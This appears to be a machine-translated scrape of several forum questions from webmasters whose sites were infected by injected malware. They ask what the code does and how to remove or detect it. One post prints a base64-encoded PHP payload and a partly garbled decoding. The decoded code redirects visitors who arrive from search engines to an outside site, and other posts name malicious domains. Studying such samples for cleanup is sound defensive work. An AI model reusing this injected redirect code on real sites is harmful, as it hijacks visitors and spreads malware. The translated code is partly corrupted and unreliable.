问题标签 [malware]

我的网站 3dsforums.com 已被标记为包含恶意软件的攻击站点。根据谷歌网站管理员工具，这是被注入到每个页面的可疑代码：

因此，我有两个问题：

这实际上是违规代码吗？

以及如何删除它？

我似乎无法通过 vBulletin 中的模板或通过 phpmyadmin 找到它，所以我不知道应该做什么。

谢谢你的帮助。

我有一个使用 CakePHP 框架的网站，趋势科技在该网站中检测到恶意软件，它的作用是将 iframe 放在其中一个文件的顶部，问题是我找不到那些 iframe/代码。我确实遇到过这种恶意软件，黑客会在 index.php 文件中注入代码，但这次真的不同。以下是趋势科技发现的屏幕截图：

如果您看一下，有一个名为 adimgsn07.co.in/k 的源站点，如果您打开该站点，它会在我的末尾显示类似“坏国家”的内容。

有没有人遇到过这个问题？

谢谢！

我一直在观察最近开始注入有缺陷的恶意脚本版本的恶意软件攻击。他们在过去 3 周内使用该脚本，我开始怀疑这是否真的是一个错误，或者他们只是针对某些浏览器的 JS 引擎的“功能”。

以下是详细信息：

恶意脚本（此处为完整版本：http: //pastebin.com/zQWepqtz）生成以wÍndow.gloa=(function()....注意Í而不是i in window开头的代码。该恶意脚本的先前工作版本生成了正确的window.gloa=(function()...代码。

问题：某些浏览器是否可以“考虑” wÍndow实际上与window相同并执行该代码？

我很想知道恶意软件检测（如谷歌的安全浏览）技术是如何工作的？谷歌搜索对我的事业没有帮助。我发现了一些叫做cuckoobox的东西，它可以做这样的事情。

网站的恶意软件检测究竟是如何工作的？那可能是什么算法？谷歌安全浏览等使用什么算法？

任何可用的python脚本？

我发现这段代码注入了客户网站上的许多 PHP 文件中。当然，原件已被混淆和编码。我已经设法对其进行解码并将其格式化为当前形式。

我的问题是：它到底完成了什么，代码是否暗示了它是如何注入的，从而阐明了如何在未来防止这种情况发生？

今年 2 月 14 日，我的网站受到了一些恶意软件代码的攻击，这些恶意软件代码在 2 月 29 日谷歌采取行动后引起了我的注意，但是所有 php 文件在检查时都受到了恶意代码的影响，我得到了以下代码

回声 base64_decode("/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9");

在解码它变成

错误报告（0）；$qazplm = headers_sent(); if (!$qazplm) { $referer = $_SERVER['HTTP_REFERER']; $uag = $_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "gogo") or stristr( $referer, "live.com") 或 stristr($referer, "aport") 或 stristr($referer, "nigma") 或 stristr($referer, "webalta") 或 stristr($referer, "begun.ru" ) 或 stristr($referer, "stumbleupon.com") 或 stristr($referer, "bit.ly") 或 stristr($referer, "tinyurl.com") 或 preg_match("/yandex.ru/yandsearch\?( .*?)\&lr\=/", $referer) 或 preg_match("/google.(.*?)/url/",http://namesti.bee.pl/ "); exit(); } } } }

我不知道它是如何进入我的服务器的，但是所有 php 文件都已生效，但其他文件都很好。整个网站现在都关闭了。我只想知道它会造成多大的伤害以及这段代码到底做了什么。我怎样才能检测到它。它是在特定时间执行的脚本吗？

某些东西正在自动编辑我们网站的全局 JS 文件以包含恶意软件。一次一个地对文件进行 CHMODing 到 777，然后附加代码。它从一个文件开始，但现在已移动到两个文件。该站点位于运行 PHP/mySQL/JQuery 的 apache 服务器上

这是一场噩梦，这种行为是否暗示了任何特定类型的漏洞利用（FTP？JS？SQL？）恶意软件导致“黑洞漏洞利用”

我需要调试恶意软件注入 Internet Explorer 的代码。如果我可以调试主进程本身就没有问题，问题是由于许多反调试措施，我无法从调试器内部运行恶意软件（此外，注入不是通过 CreateRemoteThread 执行的，也不是通过 NtQueueApcThread 执行的，即本身就很有趣，这也是我想弄清楚的）。

有没有办法将调试器附加到注入的进程？我可以使用 OllyDbg 检测到我感兴趣的线程，但是我无法附加到代码上来执行它并了解正在发生的事情。

你有什么建议吗？提前谢谢！

我遇到了一个涉及 WP 环境中的恶意软件的问题。当我在 Google 中搜索品牌并单击相应链接时，我被重定向到第三方垃圾邮件站点。

这种情况已经发生了一段时间（超过一周），但我的网站还没有被列入谷歌的黑名单。此外，像 Norton Safeweb 等网站扫描程序都声称该网站没有受到威胁。

额外细节：

我发现并删除了一些可疑的 PHPeval()函数，然后在我的页面和数据库中搜索并替换了任何剩余的代码。在该网站被 Google 清除为非黑名单状态后，我认为一切都结束了，运行更新并采取了许多措施来保护该网站免受未来的感染。

但是问题仍然存在。

这在前几天的一次黑客攻击中被注入我的网站，我解密它并得到这个：有人可以告诉我它是做什么的吗？

编辑：不要去 IP 地址，它们也可能是恶意的。